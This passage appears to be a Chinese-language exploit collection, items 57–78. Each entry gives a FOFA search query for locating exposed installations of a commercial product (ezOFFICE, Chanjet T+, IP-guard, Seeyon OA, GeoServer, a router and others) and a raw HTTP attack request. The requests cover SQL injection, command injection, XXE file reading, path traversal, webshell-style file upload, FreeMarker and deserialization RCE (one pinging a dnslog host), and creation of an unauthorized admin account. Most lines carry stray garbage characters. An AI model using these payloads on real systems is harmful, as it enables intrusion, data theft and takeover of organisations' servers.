& X, ]4 l. C( `% |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36) u; b1 t' h B0 c( X- v
Content-Type: application/json
* @* O- q: G0 t5 }$ ~
7 |, r3 L; V' w S% o; [{9 l3 ]* P6 H1 F' w u6 \
"storeID":{9 a7 H' \$ F: k& F* U
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
. N# D- I6 \8 N" i8 s "MethodName":"Start",
% X% V) L, F2 y( a+ V "ObjectInstance":{
. W1 E. ?4 {& B6 L0 {& A' ` "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
9 {' h7 W$ G8 ^0 I "StartInfo": {
1 G7 @' Y$ [- l. S "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",% r: g9 e& I T6 L3 ~" O0 ?
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
. f9 t* y8 J3 M4 d- W/ e% S }1 _+ c, v, |$ z1 V9 e
}
/ Q) {/ K( N% a- [9 p! f l }
' c/ ^* q9 [2 k) u* ?' F! w}6 c- p% Q6 E. C" b/ m% t% B
- O# @+ P; d0 @1 S" h
* F" o2 j, H+ v1 j
57. 畅捷通T+ keyEdit.aspx SQL注入8 q1 D2 w% l5 l6 J" \! Q$ W% _) Q
FOFA:app="畅捷通-TPlus"
. F( t+ k5 [( G6 N( YGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1( q) z( `# p& p
Host: host
& S0 V; o0 e) k; TUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
! y- I8 f9 N- y9 r4 z) ?Accept-Charset: utf-88 Z; m# C. d0 j" ~) E, O. r% p
Accept-Encoding: gzip, deflate) B6 E' i; o6 C7 x
Connection: close9 _5 t7 ?8 q Z- V' X0 R
7 g! O4 W: R3 U1 {) Q
. g' x& u7 W! X+ E4 U& T+ Q/ m58. 畅捷通T+ KeyInfoList.aspx sql注入4 v/ Q& h" u+ K8 N, @
FOFA:app="畅捷通-TPlus"$ X9 f' d* Q3 A( @" s) o
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1" `" M% u+ i; H- ?
Host: your-ip4 w) I8 w9 m9 _) B# |
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.361 h& x% d0 q. p, F
Accept-Charset: utf-8) S4 X: `" r5 R$ r. F
Accept-Encoding: gzip, deflate& V4 M. Z0 r/ `0 m' B& ?( r
Connection: close
/ m2 [, Q# F" h3 \" ]$ E" Y/ E% P8 f Q" V
2 u* A3 v/ l6 K: V! e8 U. w1 Q
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
/ S7 E0 P8 o( ~. w9 uFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
& l4 @* |( K# E+ n% |POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
* n8 {: W2 d( z/ s' z$ c) iHost: 192.168.86.128:9090
: l4 J* ^+ e# r% j0 qUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
& V! E2 z8 F- D$ ~2 RConnection: close
9 r5 u" z+ n3 ^Content-Length: 1669: X) Z9 V' }. `
Accept: */*; e/ S2 F( X5 f& n- w9 M! i$ a
Accept-Language: en
8 M' h7 f) h/ D. J0 Y1 m9 Q) ZContent-Type: application/x-www-form-urlencoded
8 Q' w9 J! |$ {* B& I! nAccept-Encoding: gzip% E' V+ s+ }( |+ t6 E
2 }2 z7 H1 k ~5 j7 iPAYLOAD' o0 U2 v8 Y$ G+ y/ ?/ W1 G
7 x* \. o+ ]. W: ^. ]5 D, x! P& O$ b2 w
60. 百卓Smart管理平台 importexport.php SQL注入
1 _5 h/ o3 @; A& Q# f2 ^! ~FOFA:title="Smart管理平台": {' J C) l) ~, c
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1* M" _5 S/ g' j3 j4 l
Host:" s( y) \' M& e! N0 [& z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36% C. N9 P, Q* m4 t5 n0 b5 {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) x. V6 k( ?0 W/ DAccept-Encoding: gzip, deflate
* ~8 [) p" i; O. w, pAccept-Language: zh-CN,zh;q=0.9
0 G; I# j$ Z1 Y9 N4 l7 `4 cConnection: close4 y9 R; D7 ~; W% h2 M
# }) X/ I! ]1 Z, W5 L6 ^( `
: g" y9 v3 f$ h/ m. b l! {* y
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传/ E# t3 {4 E M( y: y% g% Q
FOFA: title="欢迎使用浙大恩特客户资源管理系统"( Z( K1 C2 B) u& y
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1" i- J# m% {4 I7 C$ p/ `- u
Host: x.x.x.x
8 U+ p% H+ ^6 j; v6 V- \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: `4 t% x! _+ F' u
Connection: close
" H/ S v' k% J. kContent-Length: 27
4 |+ I4 c# ^2 U& H( W) y# MAccept: */*1 w) \& Z: B- \5 v% _4 C
Accept-Encoding: gzip, deflate4 y2 ^5 n/ d% C w* l$ q2 P n
Accept-Language: en
# _5 R6 J' a N) e9 L& v. u0 Y% V: VContent-Type: application/x-www-form-urlencoded2 ~8 q! `1 ]3 d" |
, ]0 g* V! j8 ^: e! b5 B! u9 J8uxssX66eqrqtKObcVa0kid98xa
$ j' t" c; K9 R1 K( f0 N. j( H$ @4 Q- t, U3 v$ }/ F0 S: _4 M6 a
/ ?( a3 r' R" ?" ]62. IP-guard WebServer 远程命令执行
& a6 Y( v9 S2 ~: T9 [3 |, EFOFA:"IP-guard" && icon_hash="2030860561"
# o! E+ H: m. MGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
- x7 s- x! i7 L( s5 OHost: x.x.x.x) o" b0 U. [; p" |' h
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
$ X4 H. m U/ r6 L) JConnection: close- r0 k' |; i0 W! Z; J' C0 q$ j) A) D
Accept: */*4 Y( J+ p; ?2 G7 B, j
Accept-Language: en' w& Y$ z( G1 ]" \3 {/ G+ y: ~2 B
Accept-Encoding: gzip
8 y7 r" Y% W' D
# l- R/ T8 g g% M* V' d
2 g$ \. Q7 _# i4 \4 u访问
+ h; B0 R1 F; W# O1 L: _. a1 f5 ]* I; }8 ~
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
+ H* Y* R/ `4 w) |! zHost: x.x.x.x
2 _4 r. ~1 C$ T/ P6 e. H) x& ~4 `6 b- I7 ^! F8 `+ G
1 R/ E9 T7 B+ E63. IP-guard WebServer任意文件读取
$ W4 s2 Y3 P Y( s* x, V. ZIP-guard < 4.82.0609.0+ S0 M: I1 u- P3 o6 o, j* `7 O
FOFA:icon_hash="2030860561"7 Q J. D3 I6 W. c$ w0 z0 L6 N) p
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
2 M) z6 j/ I2 }, H9 u% |5 q0 T4 zHost: your-ip4 D# K# k2 ]/ [) g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
4 |1 T( ]8 S3 d9 o+ m( A% b. `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 n$ F5 ?/ V4 ~' O+ rAccept-Encoding: gzip, deflate
* ^" I8 n. t* w4 b: {9 u$ SAccept-Language: zh-CN,zh;q=0.9: l- O' a' y) I" J! w# L
Connection: close
6 g* c' X& Z5 h" |. [* JContent-Type: application/x-www-form-urlencoded
8 s* i A5 ?' x3 T( _/ a9 P4 ?; m; c% K- i* V
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
$ ~9 V6 H2 p& y( d: k/ y
% F# i8 o; @! U3 K7 Y, s: r64. 捷诚管理信息系统CWSFinanceCommon SQL注入
1 ?4 y$ q" ]! ^; N9 {7 A# v. S2 ~FOFA:body="/Scripts/EnjoyMsg.js"
6 w5 s. A* H2 X; O$ O& ^$ |: LPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
* \% B1 M# O2 K+ g& `) WHost: 192.168.86.128:9001
+ u& @2 @3 B9 w$ D4 RUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36. `* {; s$ R9 R' C8 l' u8 P: Z2 g
Connection: close' C$ c1 _' W: U0 o
Content-Length: 369, f! M+ x% `, D" ~
Accept: */*. P# t, i! m T
Accept-Language: en9 x* [1 v, \0 k* P( m% {5 v. p" t
Content-Type: text/xml; charset=utf-8/ \& a2 A8 P- L& I* m1 Q
Accept-Encoding: gzip
+ B& V) y7 `' I( c6 \' Q. ~/ Y) J! y! i" T4 R# U! ?: q
<?xml version="1.0" encoding="utf-8"?>
4 t" b3 f- M4 }<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
& M1 S g3 B9 S5 z. P) e<soap:Body>
' r# b, |( l0 ?% j/ M <GetOSpById xmlns="http://tempuri.org/">
- e7 d: @. ~( |' Q( A F1 l3 \6 u <sId>1';waitfor delay '0:0:5'--+</sId>. I% W, O' N; \6 c D7 ~, z* l2 Z
</GetOSpById>0 C- o* H" c: T" g; N2 b& J
</soap:Body>
9 ]/ Y7 Z' W; U: n0 V</soap:Envelope>
7 e0 q8 h# Q2 E# {8 _+ z* ?. z/ ~1 f, N' A& K; X! H4 ~" g
7 c5 A" ]# _6 b
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
9 a" k, s1 r! R" R/ q- Z7 eFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"1 {$ X, }# X- t3 ^ D
响应200即成功创建账号test123456/1234563 ?, E+ [* L6 E* H4 G
POST /SystemMng.ashx HTTP/1.1" b( I, y2 e. A! O5 t' X
Host:
9 r7 f4 B b; T5 [2 v. t% A0 D# P: }# X: jUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)+ H, G9 n, j5 z2 t
Accept-Encoding: gzip, deflate0 l# Q6 D+ c$ [5 s, K/ \; h! F
Accept: */*
4 P+ k0 F) ?7 P1 ^, vConnection: close
+ K- `6 z5 J; A3 Q' F- WAccept-Language: en. J; I$ S1 i1 x7 q+ R
Content-Length: 174
; ^& p- p1 C' n7 F& I U! n* M4 F, N% t& {9 O! f
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
M( @; g9 Q5 o! ~
# ?0 Y2 E' v6 b: k+ A; P' m- J1 |) q, r C# W, [
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
/ A4 K3 t! X' }. O5 cFOFA:app="万户ezOFFICE协同管理平台"
* t+ }5 D$ Q6 |7 c4 A3 f" f1 E# u5 T9 Q
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
r j8 P6 c. L; m* ]; HHost: x.x.x.x
2 C: @8 f4 _; p2 b) k5 t# O; XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36% }: N% W9 ?; w/ l/ k3 a* I! h6 @0 b
Connection: close
) r- I3 J* A' |Accept: */*, f7 H' t6 |; ^. A. u/ L1 k
Accept-Language: en% A$ [9 o* \" G4 R* o$ P! ^/ ~! ~
Accept-Encoding: gzip
7 H: c+ b) G& O" c9 i( [3 z* _- ^
' X! E0 y: y% u4 {: S0 B$ V; w1 [. u' g5 ~' d9 F! i
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在7 Q9 Q5 a7 P0 }' j5 {! H0 r
; n6 @( O' b9 ~4 @. W {67. 万户ezOFFICE wpsservlet任意文件上传) e% {, u5 I4 I$ @, k: d( F3 a( k- c
FOFA:app="万户网络-ezOFFICE"
& H1 B1 O; Y* m. x& wnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型/ V# v7 U$ |* ]+ V. F
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
1 R* g( [; h) E8 a: e+ F4 ?Host: x.x.x.x+ U. t% b5 Q; F
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
7 Q# m; M' \5 q% D* x+ eContent-Length: 173/ K- d( o9 u) P! k# o- y3 g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
6 ^+ b9 l# e7 jAccept-Encoding: gzip, deflate% {$ ?( ^$ W7 ~2 t$ ]
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
$ E1 A9 P' P; K2 aConnection: close
! K5 c- I* M4 o: ^# j/ I5 NContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
, m/ U9 P1 T& N6 xDNT: 13 F& h/ b( T' u3 W$ j
Upgrade-Insecure-Requests: 1" V$ P/ k* f2 ~
* p& `% A3 V4 k" F; _--ufuadpxathqvxfqnuyuqaozvseiueerp
% X6 A" k4 u' i0 S2 o8 D) EContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"- s7 P6 V T4 I9 E. B& u- ~7 M
/ n( ^% J9 O% g& u: b, p. H
<% out.print("sasdfghjkj");%>
7 k; |+ \" V: ]( E9 E1 g- T# k--ufuadpxathqvxfqnuyuqaozvseiueerp--
9 s3 G, V1 {/ Z2 ]1 E! p; J5 T* T6 M9 p) i- j9 J5 G
# J- x) d# T$ r5 k! q
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp0 u2 @: C0 j) q$ K
$ K+ c3 O, E" h% B68. 万户ezOFFICE wf_printnum.jsp SQL注入
- h' F+ V5 e7 K3 _' sFOFA:app="万户ezOFFICE协同管理平台"
! P9 f; o) R m1 j8 Z' `* zGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
! f$ ^0 O' b& g/ S( RHost: {{host}}
5 D2 h1 d( T$ B9 v: pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
$ y2 N" t q5 J; R. c wAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8+ j/ ^% f( G9 _+ D' F2 }% @7 [3 [8 x
Accept-Encoding: gzip, deflate
4 i4 {" D1 ^& W/ a4 xAccept-Language: zh-CN,zh;q=0.9
( U7 ^& E8 ~) x5 o: kConnection: close4 H6 a$ m+ e9 b! Q
2 P& c. G0 j- ]- d
1 y1 O& o9 I2 a% E69. 万户 ezOFFICE contract_gd.jsp SQL注入! n* R2 D6 k( C5 S
FOFA:app="万户ezOFFICE协同管理平台"
% X( T+ m2 v+ d( aGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
0 k$ R. r9 r4 F1 `Host: your-ip
3 j' u3 T. b; H0 K7 y' ~User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36, Y9 b% ^2 n2 U* B# s7 A" ~
Accept-Encoding: gzip, deflate
* E0 S; R$ |# {Accept: */*) O2 |! V% c+ N) d( q" D1 Y' m
Connection: keep-alive
% z9 |6 Z7 g7 l- Q8 z! W+ ]! c- n+ S* {6 E. }- |( N
' _- m, [' ?: l/ A3 @% I5 C
70. 万户ezEIP success 命令执行
9 U! K3 u& W+ W5 U8 nFOFA:app="万户网络-ezEIP"- F& w% t3 N" x) A8 `" i" n- e
POST /member/success.aspx HTTP/1.1
& ?& R+ ~& |+ M qHost: {{Hostname}}
" v5 p% C, C6 |- d' E1 a- sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
' W4 x, W/ l& c/ _9 RSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=2 P& C, C2 G6 K% N3 l, P) Y' R
Content-Type: application/x-www-form-urlencoded2 \* C @5 ]. f# ^1 x8 R' P
TYPE: C9 c& f/ k$ _( u' e; b0 `; ]. y
Content-Length: 16702
?# E6 V l8 l! P5 Z' Z5 Y9 ^0 w% g9 z1 u& Y V
__VIEWSTATE=PAYLOAD6 {8 F) t- [4 ~' W; s
* z! H8 t* Y' z2 k
8 f' O2 W' e, B2 B" }71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入8 C; W' Z! Q1 \6 Y& \( l
FOFA:body="PM2项目管理系统BS版增强工具.zip". Y6 Y2 k0 N. `( u; G
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1: S2 X) f! K. {% Z0 ^
Host: x.x.x.xx.x.x.x
4 |' h4 ]" j7 U4 vUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
" E( N+ H/ U' T8 C" FConnection: close' l6 G3 [ ^& Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% T- r+ n, q" r% x. I( J7 w! `
Accept-Encoding: gzip, deflate
5 J, [, t/ H1 B" _& S7 a2 L9 X: VAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
V* ]6 M3 {' ]9 b0 q' YUpgrade-Insecure-Requests: 13 ^1 R8 k$ y2 g6 t) |$ _/ |& m
4 \. n! I0 e! K$ s
2 c+ M. s: H/ {
72. 致远OA getAjaxDataServlet XXE
6 G {* z l3 j0 R7 i5 g/ w/ ^FOFA:app="致远互联-OA"
# F- X& B5 G5 f aPOST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1) g U! s4 ~. g3 {8 O
Host: 192.168.40.131:8099
& z+ P/ i$ S# @- H3 N) {' B" XUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
; }9 C" u" G) o3 }Connection: close7 ]0 }! ?' f4 c4 N& i3 l
Content-Length: 583
) M) E, z8 |) A& I4 ^Content-Type: application/x-www-form-urlencoded0 W& g/ g" Z& S- q4 I
Accept-Encoding: gzip! x& G* ?, j9 N* F E; W
, r9 z" n, S+ I) _5 g9 ~
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E9 {4 ]$ ?) e/ O) S; m
( k6 }3 p p) r4 R8 E' b. X
- o) y) R) {3 E. L! n$ p+ a+ G73. GeoServer wms远程代码执行! X1 b/ d3 T8 ~/ \5 ]* w) p5 h Y
FOFA:icon_hash=”97540678”
6 o5 ]+ ]% R) l9 L. z: dPOST /geoserver/wms HTTP/1.1
. `7 Q# g- w: w9 F; X+ V5 u( CHost:
/ T" O D; C7 A, k- MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
1 y9 U, | z' o X! fContent-Length: 1981
8 r9 x2 @ G8 |+ EAccept-Encoding: gzip, deflate
) v, g) j, [6 ]3 w: jConnection: close
+ J1 p% ], O% B5 t9 hContent-Type: application/xml% T' z) k6 `+ p" V" S9 R& ~
SL-CE-SUID: 3
1 U+ b+ u* A( i/ S: j4 X: _* C1 | v Q9 I/ k1 G# x6 O
PAYLOAD
- w1 q9 p* e3 B5 @# O% y A6 B# N: h' X5 ^) `; n2 i3 J& @ z0 ~1 q
- U" H4 i3 ]* m; E5 {4 K74. 致远M3-server 6_1sp1 反序列化RCE
& t- W3 V/ F8 X- qFOFA:title="M3-Server") M, R, F. u3 \1 O
PAYLOAD
8 O1 U( f- e0 K0 c) y1 E2 w: d+ Q
( h" X+ A" i: V3 V8 c6 i! E75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE, R& d8 z4 N0 t) ~2 F) A/ i
FOFA:app="TELESQUARE-TLR-2005KSH"
! P7 J( ~3 [+ B4 XGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
1 f: S' T. z. k2 w6 B% h& d( L3 c5 f3 OHost: x.x.x.x
' R5 s* E2 @2 W# c" y# eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ G' v' {/ K+ A1 s5 z. {" `* D7 z
Connection: close
5 P$ s P% H2 }! pAccept: */*
' \" }' t* j+ G* {( XAccept-Language: en$ `9 F+ U; e; E, X& J$ b) o
Accept-Encoding: gzip
8 }- X/ f- N" Q: Z7 _& E. K, Y. c+ U f# g7 h
7 S, ^7 v5 z. i+ EGET /cgi-bin/test28256.txt HTTP/1.1
0 p# y2 g4 A$ b. I( t3 _5 W1 uHost: x.x.x.x
: u) y9 ]; _/ a7 o R- b
: x4 d# [4 a# P8 M/ l7 \5 Q7 d7 j7 {" H9 b$ i4 o
76. 新开普掌上校园服务管理平台service.action远程命令执行% h3 D* u8 o1 ^ L$ ~+ S' U$ {/ U
FOFA:title="掌上校园服务管理平台"
/ I+ o/ U# G1 w0 `* i5 d: U& M# iPOST /service_transport/service.action HTTP/1.1$ b# c* l6 }' g. [4 O, r
Host: x.x.x.x0 Z- w' ]" ]- b( ~. G4 ]1 g. z% \4 v8 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
! _; t( N0 W3 C+ }1 y' m# F& {, IConnection: close
! A4 t$ W1 f/ D0 _Content-Length: 211! X3 d/ R$ c$ u4 S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 q, x; b6 _. wAccept-Encoding: gzip, deflate
. i$ P5 G( N) @$ YAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ V, ]9 F) x7 m; j) |( E
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
& A& P6 ~' l$ W9 M5 |Upgrade-Insecure-Requests: 1
) b3 t) {" w8 x
3 d) E: e$ c# T4 W: M{
' _5 I3 o2 q( Q5 x& r"command": "GetFZinfo",& a# K1 Y6 G. ~# M! h! @
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"5 ^: n* v/ {2 k$ F
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"9 q* ~) L1 m; G9 x2 O; X
}
- i/ J2 I+ B- L5 y2 i! ^$ k6 R- z+ J, Z
, X, S8 j+ N* a+ s$ N0 ]- C7 a
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.17 y7 `: ?: ]4 {" r
Host: x.x.x.x& y& |1 b+ Q9 _, m$ ]4 x
: ~7 [/ |/ W* i% {, W; j J; ?. b8 \7 H& r1 C/ U- x4 V* A* b
6 ~+ B7 Z, R! G( A" `- `% S/ _
77. F22服装管理软件系统UploadHandler.ashx任意文件上传+ r3 v: c- t/ D- M. @' a: M
FOFA:body="F22WEB登陆"
5 s, |* g' Z2 w1 _& Z0 n% n/ v# ?POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1' q* y$ [, Q, H5 d
Host: x.x.x.x
/ c, x- A3 A9 I$ Z, g9 b4 tUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
- h9 ^( v, i5 {* }8 d" c* b1 _& [Connection: close
* K+ ~/ a9 A; lContent-Length: 433& q: T$ y L: q# e7 ~% ?
Accept: */*( r. Z. Y# }1 l R6 Z W5 W
Accept-Encoding: gzip, deflate
- V7 w5 ? P, P {6 DAccept-Language: zh-CN,zh;q=0.9
1 i: m" ~: g" q" _/ I: nContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
' ?9 y$ q( m' O, E& J
; f9 j2 Z7 m. N1 R# f------------398jnjVTTlDVXHlE7yYnfwBoix
: R4 |7 ^9 e2 t9 l2 `Content-Disposition: form-data; name="folder"
/ `2 W: A! y$ T m+ z7 R
$ Z2 p% ~% ]3 Z$ ]/upload/udplog
7 ^: \* Q+ O" Y9 ~9 h------------398jnjVTTlDVXHlE7yYnfwBoix5 h+ e$ @) Y1 Y
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
! r3 n* H' x' n2 s0 rContent-Type: application/octet-stream2 Z4 p" j$ l b: `" ^, ?; \
# ]% ?* t: w/ J# b& jhello1234567
: }' s0 `* M5 P------------398jnjVTTlDVXHlE7yYnfwBoix! G7 W3 W6 w: k: c- U# u
Content-Disposition: form-data; name="Upload"
* T) s& J( y7 N$ T$ ^+ ~* }1 s4 q: v8 m7 T( l
Submit Query
1 R+ `0 c( Z/ X0 |* y4 [5 x z4 p S) R------------398jnjVTTlDVXHlE7yYnfwBoix--% D3 c7 F+ `* A. i& x
( a r% x7 K1 g2 b0 N* Z
2 p. k0 l% W+ \( N c78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
! g6 U: l3 z u+ A. kFOFA:icon_hash="2001627082". Y* e& \" I0 `$ A( O
POST /Platform/System/FileUpload.ashx HTTP/1.1
7 |& e: G2 \0 @* FHost: x.x.x.x+ o$ J- g4 D+ u5 Q4 q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.156 _" z" c. `' X# Y, Y( |
Connection: close
0 ~: S+ W L' y! T6 k0 mContent-Length: 336- ^. `4 Y; q0 V1 e
Accept-Encoding: gzip
) ]: O" W( j$ O9 q8 y5 gContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
1 t7 A$ _9 Y: [0 T# ]0 r
2 K- e9 u3 k! `& H) g x& w" r------YsOxWxSvj1KyZow1PTsh98fdu6l+ J# P2 ^3 w4 r( U$ r
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"2 S' Z5 _3 h' ^$ _: I
Content-Type: image/png' [# ~6 M9 C. k; J3 h
( g0 \0 V5 Q- [; [+ Y1 ^
YsOxWxSvj1KyZow1PTsh98fdu6l
